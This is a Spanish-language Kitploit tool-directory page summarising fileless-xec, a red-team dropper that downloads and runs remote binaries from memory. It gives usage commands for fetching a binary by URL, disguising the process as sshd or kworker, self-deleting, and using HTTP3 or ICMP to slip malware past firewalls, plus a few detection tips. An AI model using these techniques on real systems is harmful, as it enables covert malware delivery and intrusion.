Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
fileless-xec — Dropper sigiloso que ejecuta binarios remotos sin descargarlos en disco. (Soporte HTTP3, soporte ICMP, rastros invisibles, multiplataforma, ...) | Kitploit
Herramientas/GitHubGitHub/ariary/fileless-xec
Generación de PayloadsExplotaciónEvasión de IDS/IPSPost-ExplotaciónEvasión de WAFPruebas de PenetraciónComando y ControlRed TeamingHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubariary/fileless-xec

fileless-xec

20942hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Dropper sigiloso que ejecuta binarios remotos sin descargarlos en disco. (Soporte HTTP3, soporte ICMP, rastros invisibles, multiplataforma, ...)

Ver Repositorio

➲ fileless-xec 🦜

👋 Ciertamente útil, principalmente por diversión, aproximadamente inspirado por el artículo de 0x00 artículo

Uso en pentest: fileless-xec se utiliza en la máquina objetivo para ejecutar sigilosamente un archivo binario ubicado en la máquina del atacante

➲ Breve historia

fileless-xec nos permite ejecutar un binario remoto en una máquina local directamente desde la memoria sin descargarlo en el disco

➪ Instalación

  • Uso simple fileless-xec [binary_url] (~curl | sh para binarios)
  • Ejecutar binario con nombre de programa especificado: fileless-xec -n /usr/sbin/sshd [binary_url]
  • Desvincular la ejecución del programa de tty: fileless-xec --setsid [...]

demostración

Explicación Queremos ejecutar localmente el binario writeNsleep ubicado en una máquina remota.

Primero iniciamos un servidor HTTP de Python en la remota. Localmente usamos fileless-xec y suplantamos el nombre /usr/sbin/sshd para la ejecución del binario writeNsleep (por sigilo y diversión). Una vez que writeNsleep arranca, fileless-xec se elimina a sí mismo (--self-remove)

Otros casos de uso

  • Ejecutar binario con stdout/stdin
  • Ejecutar binario con argumentos
  • Autoeliminación de fileless-xec
  • Evadir restricción de red usando ICMP
  • Evadir firewall con HTTP3
  • «Remote go»: ejecutar binarios de Go sin tener Go instalado localmente
  • Ejecutar un script de shell
  • Modo servidor de fileless-xec
    • Escenario RAT (Troyano de Acceso Remoto)
  • fileless-xec en Windows

➲ Historia de sigilo

  • El archivo binario no se asigna en el sistema de archivos del host
  • El nombre del programa de ejecución puede ser personalizable
  • Se puede evadir un firewall de tercera generación con soporte http3
  • fileless-xec se elimina a sí mismo una vez lanzado

memfd_create

El archivo binario remoto se almacena localmente mediante la llamada al sistema memfd_create, que lo guarda en un disco de memoria que no está asignado en el sistema de archivos (es decir, no puedes encontrarlo usando ls).

Nota: la llamada al sistema memfd_create no existe en macOS.

fexecve

Luego lo ejecutamos usando la llamada al sistema fexecve (ya que actualmente no está proporcionada por la biblioteca syscall de Go, la implementamos).

Con fexecve podemos ejecutar un programa, pero referenciamos el programa a ejecutar usando un descriptor de archivo, en lugar de la ruta completa.

HTTP3/QUIC

Habilítalo con el flag `-Q`/`http3`.
Puedes configurar un servidor ligero de rootfs web que soporte http3 ejecutando `go run ./test/http3/light-server.go -p LISTENING PORT` (Este es el equivalente http3 de `python3 -m http.server `)
usa `test/http3/genkey.sh` para generar certificado y clave.

QUIC UDP, también conocido como http3, es un protocolo de Internet de nueva generación que acelera las aplicaciones web en línea que son susceptibles a demoras, como búsquedas, transmisión de video, etc., al reducir el tiempo de ida y vuelta (RTT) necesario para conectarse a un servidor.

Debido a que QUIC utiliza cifrado propietario equivalente a TLS (esto cambiará en el futuro con una versión estandarizada), los firewalls de tercera generación que proporcionan control y visibilidad de aplicaciones encuentran dificultades para controlar y monitorear el tráfico QUIC.

Si realmente usas fileless-xec como un dropper (Solo con fines de prueba o con autorización), probablemente quieras ejecutar algún tipo de malware u otro archivo que pueda ser detectado mediante análisis de paquetes. Por lo tanto, con QUIC habilitado podrías evadir el análisis de paquetes y DESCARGAR un malware.

Además, en caso de que el firewall solo se use para permitir/bloquear tráfico, podría suceder que las reglas del firewall olviden el protocolo UDP, haciendo que tus solicitudes pasen desapercibidas

Otras habilidades para el sigilo

Aunque no esté presente en el disco de memoria, el programa en ejecución aún puede ser detectado usando el comando ps, por ejemplo.

  1. Cubrir las huellas con un nombre de programa falso

fileless-xec --name <nombre_falso> <binary_raw_url> por defecto el nombre es [kworker/u:0]

  1. Desvincularse de tty para imitar el comportamiento de un proceso demonio

fileless-xec --setsid <binary_raw_url>.

Advertencias

Aún podrías ser detectado con:

root@kitploit:~
$ lsof | grep memfd

O también con opensnoop (pero no con execsnoop)

O con un perfil seccomp que audite la llamada al sistema execve (pero es muy abrumador, ya que un comando como sleep también usa execve, por ejemplo)

Descargar herramienta